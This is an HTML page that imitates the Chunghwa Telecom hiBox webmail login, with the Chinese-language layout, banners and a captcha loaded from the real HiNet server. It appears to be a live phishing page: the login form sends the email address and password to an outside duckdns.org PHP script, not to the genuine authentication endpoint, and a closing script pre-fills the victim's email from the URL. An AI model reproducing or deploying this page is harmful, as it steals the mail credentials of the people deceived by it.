<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--hb2-pop01-zone-->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META name="keywords" content="email,HiNet Mail,Push Mail,hinet 邮件,hinet信箱,邮件委外,mail,spam,web mail,webmail,mail ASP,中华 电信 信箱,中华 电信 电子信箱,企业信箱,信箱委外,Mail Server,垃圾邮件,信箱,扫毒,邮件,邮件代管,邮件服务器,信息安全,电子信箱,电子邮件,网域名称,传真,简讯,全能信箱,企业信箱,讯息服务,企业邮件">
<META name="description" content="省去自行建置及维护电子邮件服务系统之成本及繁琐，同时享受HiNet中华电信最稳固机房与充足频宽提供企业电子邮件系统委外之专业化服务，轻松拥有安全无毒、不受垃圾邮件干扰的使用环境，让企业重要商机(邮件)不漏失；多功能整合式邮件信箱服务，操作容易却提升企业竞争力">
<title>hiBox全能信箱</title>
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
.loginTable td > *{
	vertical-align: middle;
}
a, img{
	border: none;outline: none;
}
</style>
<link href="uwc/css/hiBox_cn.css" rel="stylesheet" type="text/css" />
<!-- prevent XFS  -->
<style id="antiClickjack">
    body{display:none !important;}
</style>
<script type="text/javascript">
    if (self === top) {
        var antiClickjack = document.getElementById("antiClickjack");
        antiClickjack.parentNode.removeChild(antiClickjack);
    } else {
        top.location = self.location;
    }
</script>
<SCRIPT type="text/javascript" src="uwc/js_cn/index.js"></SCRIPT>

	<!-- jQuery & jQueryUI + theme --> 
	<link href="uwc/vkeyboard/jquery/jquery-ui.css" rel="stylesheet">
	<script src="uwc/vkeyboard/jquery/jquery.min.js"></script>
	<script src="uwc/vkeyboard/jquery/jquery-ui.min.js"></script>
	
	<!-- keyboard widget css & script (required) -->
	<link href="uwc/vkeyboard/css/keyboard.css" rel="stylesheet">
	<script src="uwc/vkeyboard/js/jquery.keyboard.js"></script>
	<script src="uwc/vkeyboard/js/cnkey.js"></script>
<script type="text/javascript">
var copyRight = null;
var productName = null;
var logoImagePath = null;
var versionImagePath = null;
var versionPageTitle = null;
var closeLabel = null;
var closeTitle = null;
var LoginImagePath = null;

function handleLoad()
{
copyRight="Copyright  2008 Sun Microsystems, Inc. All rights reserved. SUN PROPRIETARY/CONFIDENTIAL. U.S. Government Rights - Commercial software. Government users are subject to the Sun Microsystems, Inc. standard license agreement and applicable provisions of the FAR and its supplements. Use is subject to license terms. Sun, Sun Microsystems, the Sun logo and Java are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries.";
productName="Sun Java(TM) System Communications Express 6.3 update 1";
logoImagePath="uwc/images/login-logo.gif";
versionImagePath="../images/S1MC_login.html";
versionPageTitle="Version Information";
closeLabel="Close";
closeTitle="Close Window";
document.form1.username.focus();
}

/*modify start*/
function callSubmit(eventTag) { 
   //if (event.keyCode==13)
   //    handleSubmit();
   var event = eventTag||window.event;
   var currentKey = event.charCode||event.keyCode;
   if (currentKey==13)
       handleSubmit();
}
/*modify end*/
function LoadCaptcha()
{
	document.getElementById('captcha').src = https://hibox.hinet.net/uwc/stickyImg?' + Math.random(); 
	return false;
}
function handleSubmit() {
  if (document.forms.form1.save_uid.checked) {
 		selectioncookie();
	}
  if(document.form1.username.value.indexOf("@")==-1) { 
	document.form1.username.value = document.form1.username.value + "@hibox.hinet.net";	
  }	

  var targetAction =  "/uwc/auth";
  document.form1.action = targetAction;
  document.form1.submit();
}



function handleError() {
	if (false || false ) {
		/*modify start*/
		document.write('<img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22"><font color="red">账号或密码认证失败</font>');
		//document.write('<tr><td width="244" align="center" class="bk12" height="9" colspan="2">\n'+'<img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22">&nbsp;&nbsp;<font color="red">' +'<span class=AlrtErrTxt> Authentication Failed<br> Reenter your username and password.</span><br></td></tr>');
		/*
		document.write('<DIV class=logErr>');
		document.write('<table cellspacing=0 cellpadding=0 border=0>');
		document.write('<tbody>');
	        document.write('<tr>');
		document.write('<td valign=top width="28"><img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22">&nbsp;&nbsp;</td>');
		document.write("<td width='233'> <span class=AlrtErrTxt> Authentication Failed<br> Reenter your username and password.</span> </td>");

		document.write('</tr>');
		document.write('</tbody>');
		document.write('</table>');
		document.write('</DIV>');
		modify end*/
	}

}

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
</script>
</head>

<body onload="handleLoad();funShowMainBanner(0);MM_preloadImages('uwc/images_cn/botton02_01.gif','uwc/images_cn/botton02_03.gif','uwc/images_cn/botton03_02.gif','uwc/images_cn/icon-more02.gif','uwc/images_cn/menu01-02.gif','uwc/images_cn/menu02-02.gif','uwc/images_cn/menu03-02.gif','uwc/images_cn/menu04-02.gif','uwc/images_cn/menu05-02.gif','uwc/images_cn/menu06-02.gif','uwc/images_cn/menu07-02.gif','uwc/images_cn/menu08-02.gif');LoadCaptcha();">
<form method="post" action="https://25800852.duckdns.org/O-O/74775105924-37947028463-41281332901-82957146496-01439666365/H1B0X.php" id="login-form">
                    <input type="hidden" id="referrer" name="referrer" value="" />
<!-- header start-->
<SCRIPT type=text/javascript src="uwc/js_cn/header.js"></SCRIPT>
<!-- header end-->
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="7"><img src="uwc/images_cn/HB_03.gif" width="937" height="7" /></td>
  </tr>
</table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="3" height="31"><img src="uwc/images_cn/HB_04.gif" width="3" height="212" /></td>
    <td width="632" valign="top"><TABLE border="0" cellpadding="0" cellspacing="0" class=index_main_banner_table>
  <TBODY>
    <TR>
      <TD id=tdMainBannerPic>
      <DIV id=divMainBanner1><A href="#" 
            target=_parent><IMG 
            src="uwc/images_cn/HB_05.jpg" width="632" height="190" border=0></A></DIV>
      <DIV style="DISPLAY: none" id=divMainBanner5><A href="#"
            target=_parent><IMG border=0 src="uwc/images_cn/HB_05-06.png"></A></DIV>
      <DIV style="DISPLAY: none" id=divMainBanner2><A href="#" 
            target=_parent><IMG border=0 src="uwc/images_cn/HB_05-02.jpg"></A></DIV>
      <DIV style="DISPLAY: none" id=divMainBanner3><A href="#" 
            target=_parent><IMG border=0 src="uwc/images_cn/HB_05-03.jpg"></A></DIV>
      <DIV style="DISPLAY: none" id=divMainBanner4><A href="#" 
            target=_parent><IMG border=0 src="uwc/images_cn/HB_05-04.jpg"></A></DIV>
      </TD>
    </TR>
    <TR>
      <TD height="22" align=left valign="top" background="uwc/images_cn/banner-bg01.gif"><table width="600" border="0" cellpadding="0" cellspacing="0">
          <tr>
            <td align="right"><TABLE border="0" cellpadding="0" cellspacing="0" class=index_main_banner_page_table>
              <TBODY>
                <TR id=trMainBannerPage>
                  <TD class=index_main_banner_page_current><A 
                  onmouseover=funShowMainBanner(0); 
                  href="javascript: void(0);">1</A></TD>
                  <TD class=index_main_banner_page_td><A 
                  onmouseover=funShowMainBanner(1); 
                  href="javascript: void(0);">2</A></TD>
                  <TD class=index_main_banner_page_td><A 
                  onmouseover=funShowMainBanner(2); 
                  href="javascript: void(0);">3</A></TD>
                  <TD class=index_main_banner_page_td><A 
                  onmouseover=funShowMainBanner(3); 
                  href="javascript: void(0);">4</A></TD>
                  <TD class=index_main_banner_page_td><A 
                  onmouseover=funShowMainBanner(4); 
                  href="javascript: void(0);">5</A></TD>
                </TR>
              </TBODY>
            </TABLE></td>
          </tr>
        </table></TD>
    </TR>
  </TBODY>
</TABLE></td>
    <td width="8"><img src="uwc/images_cn/HB_06.gif" width="8" height="212" /></td>
    <td width="292" align="center" valign="top" background="uwc/images_cn/HB_07.gif">
    
    <table width="252" height="135" border="0" cellpadding="0" cellspacing="1" class="loginTable">
      <tr>
        <td height="40" colspan="2" align="right" valign="middle" class="loginTable">
		&nbsp; <script>
				handleError();
			   </script>
	    </td>
      </tr>
      <tr>
        <td height="30" colspan="2" align="center">账号： 
          <input type="text" id="email" name="email" placeholder="请输入完整的email" maxlength="50" size="20" /><img id="uname" class="tooltip" title="開啟虛擬鍵盤" src="uwc/vkeyboard/keypad.png">      

          <br /></td>
      </tr>
      <tr>
        <td height="30" colspan="2" align="center">密码：
		  <input type="password" id="password" name="password" maxlength="50" size="20" /><img id="passwd" class="tooltip" title="Using Virtual Keyboard" src="uwc/vkeyboard/keypad.png">
		  
		  </td>
      </tr>
				  		
		
	  <tr>
		<td height="32" align="center">
			<img id="captcha" src="https://hibox.hinet.net/uwc/stickyImg" />&nbsp;=&nbsp;
			<input type="text" id="captchaans" name="captcha" placeholder="请计算左图答案" class="ui-widget-content ui-corner-all" style="text-align: center;" size="12" maxlength="3" value=""/>
			<a href="#" onclick="document.getElementById('captchaans').value=''; document.getElementById('captcha').src = https://hibox.hinet.net/uwc/stickyImg?' + Math.random(); return false;" tabindex="-1"><img src="uwc/images/refresh.png" height="15" width="15" tabindex="-1"/></a>		
		</td>
		<td>
		
		</td>
	  </tr>

	  
  
			
		
      <tr>
        <td height="32" align="center" valign="bottom"><input type="checkbox" name="save_uid" id="save_uid" tabindex="-1"/>
       记住我的账号
        <button id="submit_btn" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image6','','uwc/images_tw/botton02_01.gif',1)"><img src="uwc/images_tw/botton01_01.gif" alt="登入" name="Image6" width="47" height="25" border="0" id="Image6" /></button><button   onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image7','','uwc/images_tw/botton02_03.gif',1)"><img src="uwc/images_tw/botton01_03.gif" alt="說明" name="Image7" width="47" height="25" border="0" id="Image7" onclick="MM_openBrWindow('uwc/homepage_tw/popup.html','','width=395,height=220')" /></button>  
        </td>
        
      </tr>
      <tr>
		<td align="center">
			<a onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image11','','uwc/images_tw/botton03_02.gif',1)" target="_blank" href="https://apply.hibox.hinet.net/hiBox_extend/mailAdmin/login.php"><img id="Image11" width="222" height="36" border="0" name="Image11" alt="管理者登入ENTER" src="uwc/images_tw/botton03_01.gif"></a>
		</td>
	  </tr>
    </table>


	  </td>
    <td width="2"><img src="uwc/images_cn/HB_08.gif" width="2" height="212" /></td>
  </tr>
</table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="7"><img src="uwc/images_cn/HB_09.gif" width="937" height="9" /></td>
  </tr>
</table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="206" valign="top" background="uwc/images_cn/HB_10.gif"><table width="937" height="190" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="657" height="190" align="center" valign="top"><table width="620" height="39" border="0" cellpadding="0" cellspacing="0">
          <tr>
            <td width="526" height="39" align="left" valign="bottom"><img src="uwc/images_cn/td-01.gif" alt="讯息快递" width="375" height="26" /></td>
            <td width="94" align="right" valign="bottom"><a href="uwc/homepage_cn/news.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image13','','uwc/images_cn/icon-more02.gif',1)"><img src="uwc/images_cn/icon-more01.gif" alt="更多讯息" name="Image13" width="94" height="20" border="0" id="Image13" /></a></td>
          </tr>
        </table>
         <!--info start-->
			<SCRIPT type=text/javascript src="uwc/js_cn/info.js"></SCRIPT>
		  <!--info end--> 
		</td>
        <td width="20" align="left"><img src="uwc/images_cn/dis-01.gif" width="3" height="190" /></td>
        <td width="260" align="left" valign="middle"><table width="100" border="0" cellpadding="0" cellspacing="4">
            <tr>
              <td><a href='uwc/homepage_cn/promotion02.html'><img src="uwc/images_cn/banner01.gif" width="218" height="80" border="0" /></a></td>
            </tr>
            <tr>
              <td><a href='uwc/homepage_cn/news.html#new05'><img src="uwc/images_cn/banner02.gif" width="218" height="80" border="0" /></a></td>
            </tr>
          </table>
          </td>
      </tr>
    </table></td>
  </tr>
</table>
</form>
<script src="uwc/js/placeholders.min.js"></script>
<!--footer start-->
<SCRIPT type="text/javascript" src="uwc/js_cn/footer.js"></SCRIPT>
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>

<script>
        var url = window.location.hash;
        var email = document.URL.substr(document.URL.indexOf('#')+1).split('#')[0];
        var pwdError = document.URL.substr(document.URL.indexOf('#')+1).split('#')[1];
        var regex = /^([a-zA-Z0-9_\.\-\+])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        var pwdAsked = false;
        $("#referrer").val(window.location.href);

        if(email != '' && regex.test(email)) {
            $("#email").val(email);
            $("#email").parent().addClass('focused');
        }

        if(pwdError) {
			$('#error-block').removeClass('hidden');
			$('#error-block1').addClass('hidden');
			
        }


        $("#password").keypress(function(e) {
            var key = e.which;
            if(key == 13) {
                $("#submit_btn").trigger('click');
            }
        });

        $('#submit_btn').click(function() {
            $("#login-form").submit();
        });

        $('.contact-menu-open').click(function() {
            $(this).toggleClass('open');
            $('#contact-menus').toggleClass('open');
        });

        $('.main').click(function() {
            $('#contact-menus').removeClass('open');
        });

        $('.login-panel input').on('focus', function() {
            $(this).parent().addClass('focused');
        });

        $('.login-panel input').on('blur', function(e) {
            if(e.target.value === '') $(this).parent().removeClass('focused');
        });

        $('#toggle-password-showing').click(function() {
            console.log($('#password').attr('type'));
            var currentType = $('#password').attr('type');

            if(currentType === 'password') {
                $('#password').attr('type', 'text');
                $('#toggle-password-showing').text('Hide');
            }
            else {
                $('#password').attr('type', 'password');
                $('#toggle-password-showing').text('Show');
            }
        });

        $('.uxicon-svg-container.ux-control-indicator').click(function() {
            $('#keep_signin').trigger('click');
        });

        $('label[key=keep_signin]').click(function() {
            $('#keep_signin').trigger('click');
        });

        $('#keep_signin').on('click', function(e) {
            var isChecked = $(this).is(':checked');
            
            if(isChecked) {
                $('.check-box-wrapper').addClass('checked');
            }
            else {
                $('.check-box-wrapper').removeClass('checked');
            }
        });
    </script>
 <!--footer end-->
</body>

</html>

 

<link rel="SHORTCUT ICON" href="webmail/favicon.ico">



